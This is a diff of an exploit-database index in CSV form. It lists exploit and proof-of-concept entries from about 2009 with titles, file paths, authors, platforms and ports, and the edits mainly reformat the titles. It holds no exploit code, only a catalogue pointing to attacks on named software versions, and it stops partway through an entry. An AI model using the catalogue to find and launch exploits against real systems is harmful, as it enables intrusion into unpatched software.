id,file,description,date,author,platform,type,port 9643,platforms/windows/remote/9643.txt,"kolibri+ webserver 2 - Directory Traversal",2009-09-11,"Usman Saeed",windows,remote,0 9644,platforms/windows/remote/9644.py,"Kolibri+ Webserver 2 - (GET Request) Remote SEH Overwrite Exploit",2009-09-11,blake,windows,remote,80 9645,platforms/aix/local/9645.sh,"IBM AIX 5.6/6.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug",2009-09-11,"Marco Ivaldi",aix,local,0 -9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 +9646,platforms/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot Exploit",2009-09-11,crashbrz,hardware,dos,0 9647,platforms/php/webapps/9647.txt,"PHP-IPNMonitor - (maincat_id) SQL Injection",2009-09-11,noname,php,webapps,0 9648,platforms/php/webapps/9648.txt,"Joomla Hotel Booking System - (XSS/SQL Injection) Multiple Vulnerabilities",2009-09-11,K-159,php,webapps,0 9649,platforms/windows/remote/9649.txt,"Xerver HTTP Server 4.32 - Arbitrary Source Code Disclosure",2009-09-11,Dr_IDE,windows,remote,0 9650,platforms/windows/remote/9650.txt,"Kolibri+ Web Server 2 - Remote Arbitrary Source Code Disclosure (2)",2009-09-11,Dr_IDE,windows,remote,0 -9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 +9651,platforms/multiple/remote/9651.txt,"Mozilla Firefox < 3.0.14 - Multiplatform RCE via pkcs11.addmodule",2009-09-11,"Dan Kaminsky",multiple,remote,0 9652,platforms/windows/remote/9652.sh,"Oracle Secure Backup Server 10.3.0.1.0 - Auth Bypass/RCI Exploit",2009-09-14,ikki,windows,remote,80 9653,platforms/php/webapps/9653.txt,"Joomla Component Turtushout 0.11 - (Name) SQL Injection",2009-09-14,jdc,php,webapps,0 9654,platforms/php/webapps/9654.php,"Joomla Component AlphaUserPoints - SQL Injection",2009-09-14,jdc,php,webapps,0 9655,platforms/windows/local/9655.pl,"Invisible Browsing 5.0.52 - (.ibkey) Local Buffer Overflow Exploit",2009-09-14,PLATEN,windows,local,0 9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0 9657,platforms/windows/dos/9657.pl,"httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos,0 -9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN Persistent XSS",2009-09-14,"599eme Man",hardware,remote,0 +9658,platforms/hardware/remote/9658.txt,"Neufbox NB4-R1.5.10-MAIN - Persistent XSS",2009-09-14,"599eme Man",hardware,remote,0 9659,platforms/windows/local/9659.cpp,"Portable E.M Magic Morph 1.95b - .MOR File Stack Buffer Overflow PoC",2009-09-14,"fl0 fl0w",windows,local,0 9660,platforms/windows/remote/9660.pl,"Techlogica HTTP Server 1.03 - Arbitrary File Disclosure Exploit",2009-09-14,"ThE g0bL!N",windows,remote,0 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - (.m3u) Local Buffer Overflow Exploit",2009-09-14,dmc,windows,local,0 9662,platforms/windows/remote/9662.c,"IPSwitch IMAP Server 9.20 - Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,143 -9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 UTF-8 URL Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,0 +9663,platforms/windows/remote/9663.py,"Mozilla Firefox 2.0.0.16 - UTF-8 URL Remote Buffer Overflow Exploit",2009-09-14,dmc,windows,remote,0 9664,platforms/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Remote Denial of Service (Auth)",2009-09-14,PLATEN,windows,dos,0 -9665,platforms/php/webapps/9665.pl,"PHP Pro Bid Remote Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 +9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Remote Blind SQL Injection",2009-09-14,NoGe,php,webapps,0 9666,platforms/hardware/dos/9666.php,"Apple Safari IPhone - (using tel:) Remote Crash Exploit",2009-09-14,cloud,hardware,dos,0 9667,platforms/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos,0 9668,platforms/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - (.jpg) Local Crash PoC",2009-09-14,the_Edit0r,windows,dos,0 @@ -9192,7 +9192,7 @@ id,file,description,date,author,platform,type,port 9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 9800,platforms/windows/remote/9800.cpp,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (2)",2009-11-05,"Megumi Yanagishita",windows,remote,80 9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 -9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 +9802,platforms/windows/remote/9802.html,"IBM Installation Manager 1.3.0 - iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - DoS (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 @@ -9203,18 +9203,18 @@ id,file,description,date,author,platform,type,port 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - DoS",2009-09-28,Dr_IDE,windows,dos,21 9812,platforms/php/webapps/9812.txt,"Joomla IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Remote Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 -9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351",2009-09-25,Dr_IDE,windows,remote,0 +9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351 - Exploit",2009-09-25,Dr_IDE,windows,remote,0 9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 -9816,platforms/windows/remote/9816.py,"VLC Media Player 1.0.2 smb:// URI Stack Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 +9816,platforms/windows/remote/9816.py,"VLC Media Player 1.0.2 - smb:// URI Stack Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 9818,platforms/php/webapps/9818.txt,"Klonet E-Commerce - products.php SQL Injection",2009-09-25,S3T4N,php,webapps,0 9819,platforms/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,multiple,webapps,0 -9820,platforms/php/webapps/9820.txt,"Regental Medien Blind SQL Injection",2009-09-24,NoGe,php,webapps,0 +9820,platforms/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,php,webapps,0 9821,platforms/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,php,webapps,0 9822,platforms/php/webapps/9822.txt,"Joomla Fastball component 1.1.0-1.2 - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 -9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd DoS",2009-09-24,"Jeremy Brown",solaris,dos,0 +9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - DoS",2009-09-24,"Jeremy Brown",solaris,dos,0 9824,platforms/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,php,webapps,0 -9825,platforms/php/webapps/9825.txt,"e107 0.7.16 Referer header xss",2009-09-24,MustLive,php,webapps,0 +9825,platforms/php/webapps/9825.txt,"e107 0.7.16 - Referer header xss",2009-09-24,MustLive,php,webapps,0 9826,platforms/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,php,webapps,0 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection / XSS",2009-09-23,"Alexey Sintsov",php,webapps,0 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 @@ -9259,10 +9259,10 @@ id,file,description,date,author,platform,type,port 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - DoS",2009-10-26,"Usman Saeed",windows,dos,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 9876,platforms/php/webapps/9876.txt,"DedeCMS 5.1 - SQL Injection",2009-10-14,"Securitylab Security Research",php,webapps,0 -9877,platforms/asp/webapps/9877.txt,"DWebPro command injection",2009-10-17,"Rafael Sousa",asp,webapps,0 +9877,platforms/asp/webapps/9877.txt,"DWebPro - command injection",2009-10-17,"Rafael Sousa",asp,webapps,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - DoS",2009-10-20,"bellick ",windows,dos,7144 9880,platforms/php/webapps/9880.txt,"Endonesia CMS 8.4 - Local File Inclusion",2009-11-04,s4r4d0,php,webapps,0 -9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q PoC BoF",2009-10-23,"Francis Provencher",windows,dos,110 +9881,platforms/windows/dos/9881.txt,"Eureka Mail Client 2.2q - PoC BoF",2009-10-23,"Francis Provencher",windows,dos,110 9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0 9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed certificate PoC",2009-10-21,Dr_IDE,windows,local,0 9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source disclosure",2009-10-21,Dr_IDE,windows,webapps,0 @@ -9333,7 +9333,7 @@ id,file,description,date,author,platform,type,port 9954,platforms/linux/remote/9954.rb,"Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Privilege Escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - DoS",2009-10-14,"Townsend Harris",hardware,dos,0 -9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 +9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - XSS / information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistant XSS",2011-01-17,Penguin,php,webapps,0 @@ -9345,7 +9345,7 @@ id,file,description,date,author,platform,type,port 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 -9971,platforms/windows/local/9971.php,"Spider Solitaire PoC",2009-10-15,SirGod,windows,local,0 +9971,platforms/windows/local/9971.php,"Spider Solitaire - PoC",2009-10-15,SirGod,windows,local,0 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 9973,platforms/multiple/local/9973.sh,"Sun VirtualBox 3.0.6 - Privilege Escalation",2009-10-17,prdelka,multiple,local,0 @@ -9370,14 +9370,14 @@ id,file,description,date,author,platform,type,port 9996,platforms/php/webapps/9996.txt,"Article Directory - Index.php Remote File Inclusion",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 -9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 +9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 10000,platforms/hardware/remote/10000.txt,"Cisco ACE XML Gateway 6.0 - Internal IP disclosure",2009-09-25,nitr0us,hardware,remote,0 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews - Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL Injection",2009-10-09,"Andrea Fabrizi",php,webapps,0 -10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 +10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 -10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1",2009-10-08,"Mark from infosecstuff",php,webapps,0 +10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 - Exploit",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 @@ -9395,7 +9395,7 @@ id,file,description,date,author,platform,type,port 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 -10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 (Metasploit)",2006-03-08,MC,linux,remote,7144 +10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 - Exploit (Metasploit)",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 @@ -9409,7 +9409,7 @@ id,file,description,date,author,platform,type,port 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 -10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0 +10043,platforms/php/webapps/10043.txt,"redcat media - SQL Injection",2009-10-02,s4va,php,webapps,0 10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0 10045,platforms/php/webapps/10045.txt,"Community Translate - File Inclusion",2009-10-12,NoGe,php,webapps,0 10046,platforms/php/webapps/10046.txt,"Dazzle Blast - Remote File Inclusion",2009-10-12,NoGe,php,webapps,0 @@ -9418,7 +9418,7 @@ id,file,description,date,author,platform,type,port 10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - File Inclusion",2009-10-12,kaMtiEz,php,webapps,0 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - XSS/CSRF/LFI/Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 10052,platforms/php/webapps/10052.txt,"The BMW - inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0 -10053,platforms/windows/remote/10053.txt,"httpdx 1.4 Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 +10053,platforms/windows/remote/10053.txt,"httpdx 1.4 - Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - XSS",2009-07-04,sh2kerr,hardware,remote,80 10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 - imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 @@ -9441,7 +9441,7 @@ id,file,description,date,author,platform,type,port 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 -10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 +10079,platforms/windows/remote/10079.txt,"Google Apps - mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 @@ -9460,7 +9460,7 @@ id,file,description,date,author,platform,type,port 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote DoS",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 10093,platforms/multiple/remote/10093.txt,"Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution",2009-11-04,"Francis Provencher",multiple,remote,0 -10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 +10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting",2009-10-15,IBM,jsp,webapps,0 10095,platforms/multiple/remote/10095.txt,"Samba 3.0.10 < 3.3.5 - Format String And Security Bypass",2009-11-13,"Jeremy Allison",multiple,remote,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - authentication bypass",2009-11-13,"Stuart Udall",php,webapps,0 10097,platforms/php/remote/10097.php,"PHP 5.2.11/5.3.0 - Multiple Vulnerabilities",2009-11-13,"Maksymilian Arciemowicz",php,remote,0 @@ -9476,8 +9476,8 @@ id,file,description,date,author,platform,type,port 40083,platforms/php/webapps/40083.txt,"WordPress Activity Log Plugin 2.3.1 - Persistent XSS",2016-07-11,"Han Sahin",php,webapps,80 10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload",2009-11-17,blackenedsecurity,asp,webapps,0 -10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 -10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 +10162,platforms/windows/remote/10162.py,"Home FTP Server - 'MKD' Command Directory Traversal",2009-11-17,zhangmc,windows,remote,21 +10163,platforms/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 10164,platforms/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local DoS",2009-09-29,Heurs,windows,dos,0 10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript - (aid) Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 @@ -9500,7 +9500,7 @@ id,file,description,date,author,platform,type,port 10189,platforms/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps,0 10190,platforms/windows/dos/10190.txt,"Cisco VPN Client - Integer Overflow (DOS)",2009-11-21,"Alex Hernandez",windows,dos,0 10192,platforms/php/webapps/10192.txt,"Joomla Component Com_Joomclip - (cat) SQL injection",2009-11-21,"599eme Man",php,webapps,0 -10201,platforms/windows/local/10201.pl,"TEKUVA Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 +10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 10202,platforms/linux/dos/10202.c,"Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0 10203,platforms/linux/dos/10203.txt,"BibTeX - (.bib) File Handling Memory Corruption",2009-11-13,"Vincent Lafevre",linux,dos,0 10204,platforms/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution",2009-11-19,mrx,windows,dos,0 @@ -9526,15 +9526,15 @@ id,file,description,date,author,platform,type,port 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 Plugin",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 Plugin - Exploit",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Shell Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 -10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 +10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix - Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 -10235,platforms/windows/remote/10235.py,"Eureka Mail Client Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 -10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload",2009-11-26,DigitALL,php,webapps,0 +10235,platforms/windows/remote/10235.py,"Eureka Mail Client - Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 +10236,platforms/php/webapps/10236.txt,"Flashden - Multiple File Uploader Shell Upload",2009-11-26,DigitALL,php,webapps,0 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 - Malformed URL Request DoS",2000-06-01,netsec,hardware,dos,80 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 @@ -9562,13 +9562,13 @@ id,file,description,date,author,platform,type,port 10263,platforms/linux/webapps/10263.txt,"quate CMS 0.3.5 - (RFIi/LFI) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 -10266,platforms/multiple/local/10266.txt,"Oracle ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 -10267,platforms/multiple/local/10267.txt,"Oracle ctxsys.drvxtabc.create_tables Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 +10266,platforms/multiple/local/10266.txt,"Oracle - ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 +10267,platforms/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10268,platforms/multiple/local/10268.txt,"Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0 10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component 0.15 - Multiple Remote File Inclusion",2009-12-01,kaMtiEz,php,webapps,0 -10274,platforms/php/webapps/10274.txt,"Simple Machines Forum Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 +10274,platforms/php/webapps/10274.txt,"Simple Machines Forum - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS / AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 @@ -9598,7 +9598,7 @@ id,file,description,date,author,platform,type,port 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 - Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 10312,platforms/php/webapps/10312.php,"Joomla 1.5.x - com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 -10313,platforms/linux/local/10313.c,"libmodplug 's3m' Remote Buffer 